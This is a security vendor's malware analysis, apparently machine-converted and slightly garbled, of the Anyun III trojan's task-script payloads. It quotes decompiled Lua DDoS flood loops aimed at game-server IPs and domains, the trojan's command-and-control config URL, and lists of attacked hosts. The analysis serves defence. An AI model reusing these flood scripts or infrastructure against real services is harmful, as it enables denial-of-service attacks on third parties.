騰訊御安全深度解析暗雲Ⅲ

時間  2019-11-09
標籤 騰訊 安全 深度 解析 欄目 騰訊 简体版
原文   原文鏈接

【關鍵詞:騰訊御安全,APK漏洞掃描,APP保護,Android防破解】php

前面對暗雲的分析報告中,騰訊電腦管家安全團隊和騰訊御安全基本摸清暗雲Ⅲ的感染方式和傳播方式,也定位到被感染暗雲Ⅲ的機器會在啓動時從服務端下載任務腳本包——ndn.db文件,且該文件會常進行更換。此外,撰寫本文的同時,騰訊御安全也收集到多個不一樣功能的ndn.db文件,如下騰訊御安全將對暗雲Ⅲ危害展開具體分析。html

0x01 暗雲payload行爲分析
在解析db文件前,先過一次暗雲payload行爲:ios

木馬每5分鐘會聯網下載一次配置文件 http://www.acsewle.com:8877/ds/kn.htmlweb

該html是個配置文件,木馬會檢查其中的版本號,並保存,其後每次都會比較,以肯定是否更新。數據庫

若是有更新,則下載新版本,並根據配置下載文件執行或者建立svchost.exe傀儡進程執行。api

木馬乾活模塊lcdn.db其實爲lua腳本解析器,主要功能下載任務db,進而解析執行:安全

0x02 任務腳本文件結構服務器

經過分析,得知ndn.db的文件結構,大體以下:
struct f_db{
DWORD fileLen; // lua腳本bytecode文件大小網絡

DWORD runType; // 運行類型
char fileName[24]; // lua腳本文件名
char fileData[fileLen]; // lua腳本bytecode內容

}
以下圖中,紅色框爲文件大小,灰色框爲運行類型,藍色框爲文件名,紫色框爲真實的bytecode內容。socket

根據文件結構,進而可從ndn.db中提取到多個lua腳本的bytecode。

0x03 任務腳本功能分類
分析得知,其使用的lua版本爲5.3,是自行更改過虛擬機進行編譯。使用普通反編譯工具反編譯後,只能獲得部分可讀明文,通過分析統計可知道暗雲Ⅲ現有發佈的功能大體有如下幾類:
一、統計類
解密獲得的111tj.lua腳本,實則爲參與攻擊機器統計腳本。

該腳本主要做用爲:每隔五分鐘,帶Referer:http://www.acsewle.com:8877/um.php訪問cnzz和51.la兩個站點統計頁面,以便統計參與攻擊的機器數及次數。
統計頁面地址爲:
http://c.cnzz.com/wapstat.php...
http://web.users.51.la/go.asp...
訪問流量:

二、DDoS類
  這類腳本,簡單粗暴,直接do、while循環,不停地對目標服務發起訪問。以下爲dfh01.lua中代碼,其目標是針對大富豪棋牌遊戲。
L1_1.get = L4_4
L4_4 = {
"182.86.84.236",
"119.167.151.218",
"27.221.30.113",
"119.188.96.111",
"113.105.245.107"
}
while true do
url = "http://" .. "web.168dfh.biz" .. "/"
L1_1.get(url)
url = "http://" .. "web.168dfh.cn" .. "/"
L1_1.get(url)
url = "http://" .. "web.168dfh.top" .. "/"
L1_1.get(url)
end
  又如,dfhcdn01.lua中:
while true do
sendlogin("114.215.184.159", 8002)
sendlogin("114.215.169.190", 8005)
sendlogin("114.215.169.97", 8002)
sendlogin("121.41.91.65", 8005)
sendlogin("123.56.152.5", 8000)
sendlogin("121.199.2.34", 8002)
sendlogin("121.199.6.149", 8000)
sendlogin("121.199.15.237", 8002)
sendlogin("101.200.223.210", 17000)
sendlogin("121.199.14.117", 8002)
sendlogin("112.125.120.141", 9000)
sendlogin("123.57.32.93", 9000)
end
  再如,在new59303.lua中:

三、CC攻擊類
  解密獲得的yiwanm001.lua腳本中,包含有各種UserAgent,在發起攻擊時,會隨機使用這些UserAgent來對目標網站發起訪問,此外該腳本還將監測是否跳轉到驗證碼頁面,並自動提取Cookie完成訪問。
  隨機UA:

獲取Cookie:

這個腳本攻擊的目標爲m.yiwan.com。爲了精確到指定目標,腳本中還寫死了兩個服務器ip。
L6_6= "http://139.199.135.131:80/"
L7_7= "http://118.89.206.177:80/"
攻擊流量截圖:

又如,攻擊腳本jjhm77.lua腳本中,從http://down.jjhgame.com/ip.tx...

以後按照目標服務所需的特定格式構造隨機數據:

循環發送,開始攻擊:

0x04 危害及建議
  暗雲自帶lua腳本解析器,攻擊全程文件不落地,具體需執行任務的db文件也是隨時在服務端更新發布,如此增大了殺軟查殺難度。坐擁上百萬的暗雲控制端(數據來自:CNCERT[http://www.cert.org.cn/publis...]),已經能夠不須要肉雞無間斷髮起鏈接,便可完成大規模的指向性攻擊。如此的好處即是在用戶無感的狀況下,佔用用戶帶寬,完成攻擊。
  到目前爲止,騰訊反病毒實驗室發現的暗雲攻擊目標大多爲各種棋牌、遊戲服務器。截止當前,暗雲控制端url已自行解析到127.0.0.1,下發url也已失效。但不肯定暗雲下一次開啓時,任務db文件中lua腳本不會是更加惡意的功能。
  因此,騰訊電腦管家建議用戶積極採起安全防範措施:
  一、不要選擇安裝捆綁在下載器中的軟件,不要運行來源不明或被安全軟件報警的程序,不要下載運行遊戲外掛、私服登陸器等軟件;
  二、按期在不一樣的存儲介質上備份信息系統業務和我的數據。
  三、下載騰訊電腦管家進行「暗雲」木馬程序檢測和查殺;
0x05 附錄(暗雲攻擊過的ip地址及URL)
歷史攻擊過的IP列表:
114.64.222.26
103.254.188.247
114.64.222.27
60.5.254.82
60.5.254.81
60.5.254.47
218.29.50.40
218.29.50.39
60.221.254.229
60.221.254.230
122.143.27.170
182.106.194.83
27.155.73.17
27.155.73.16
125.89.198.29
182.106.194.84
111.47.220.47
111.47.220.46
111.20.250.133
123.128.14.174
106.59.99.46
116.55.236.92
218.5.238.249
106.59.99.47
117.27.241.114
117.27.241.181
14.215.100.76
113.12.84.24
113.12.84.23
14.215.100.75
112.90.213.51
112.90.213.52
58.223.166.19
122.5.53.120
122.5.53.121
58.51.150.40
219.146.68.119
114.80.230.238
114.80.143.223
114.80.230.237
112.25.83.28
120.221.25.169
120.221.24.125
117.148.163.80
112.25.83.29
120.221.24.126
117.148.163.79
182.140.142.40
118.123.97.16
118.123.97.17
220.165.142.221
182.140.142.39
218.76.109.67
222.243.110.83
222.243.110.82
120.221.25.170
113.5.80.249
218.60.109.79
113.5.80.248
218.60.109.80
58.51.150.52
122.246.17.9
120.199.86.132
122.228.30.147
122.228.30.38
122.228.11.175
116.211.144.70
218.11.0.9
118.178.213.63
116.211.168.169
116.31.100.147
116.31.100.3
116.31.100.144
116.31.100.148
116.31.100.170
122.246.17.15
116.211.144.240
116.211.144.129
116.211.144.242
116.211.144.206
116.211.144.238
116.211.144.239
116.211.144.219
114.215.184.159
114.215.169.190
114.215.169.97
121.41.91.65
123.56.152.5
121.199.2.34
121.199.6.149
121.199.15.237
101.200.223.210
121.199.14.117
112.125.120.141
123.57.32.93
182.86.84.236
119.167.151.218
27.221.30.113
119.188.96.111
113.105.245.107
139.224.32.159
139.224.68.202
139.224.35.106
139.196.252.62
139.224.35.175
139.196.252.245
139.224.33.199
139.224.68.48
139.224.35.132
139.196.252.61
139.224.35.188
139.199.135.131
118.89.206.177
歷史攻擊過的URL列表:
http://senios.138kkk.com
http://senand.138kkk.com
http://m.yiwan.com
http://oss.aliyuncs.com/uu919...
http://oss.aliyuncs.com/uu919...
http://senres.138kkk.com/sen/...
http://senres.138kkk.com/sen/...
http://58.51.150.52/sso/ios/f...
http://ssores.u2n0.com/sso/io...
http://pcupdate.game593.com/?...
http://senios.uts7.com
http://senand.uts7.com
http://139.199.135.131:80
http://118.89.206.177:80
0x06 參考文檔
[1] 暗雲Ⅲ BootKit 木馬分析:http://www.freebuf.com/articl...
[2] 暗雲Ⅲ木馬傳播感染分析:http://www.freebuf.com/articl...
[3] 哈爾濱工業大學關於防範暗雲木馬的通知:http://www.80sd.org/guonei/20...
[4] CNCERT關於「暗雲」木馬程序有關狀況通:http://www.cert.org.cn/publis...

關於騰訊安全實驗室

騰訊移動安全實驗室:基於騰訊手機管家產品服務,經過終端安全平臺、網絡安全平臺和硬件安全平臺爲移動產業打造雲管端全方位的安全解決方案。其中騰訊御安全專一於爲我的和企業移動應用開發者,提供全面的應用安全服務。

騰訊安全反詐騙實驗室:匯聚國際最頂尖白帽黑客和多位騰訊專家級大數據人才,專一反詐騙技術和安全攻防體系研究。反詐騙實驗室擁有全球最大安全雲數據庫並服務99%中國網民。

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程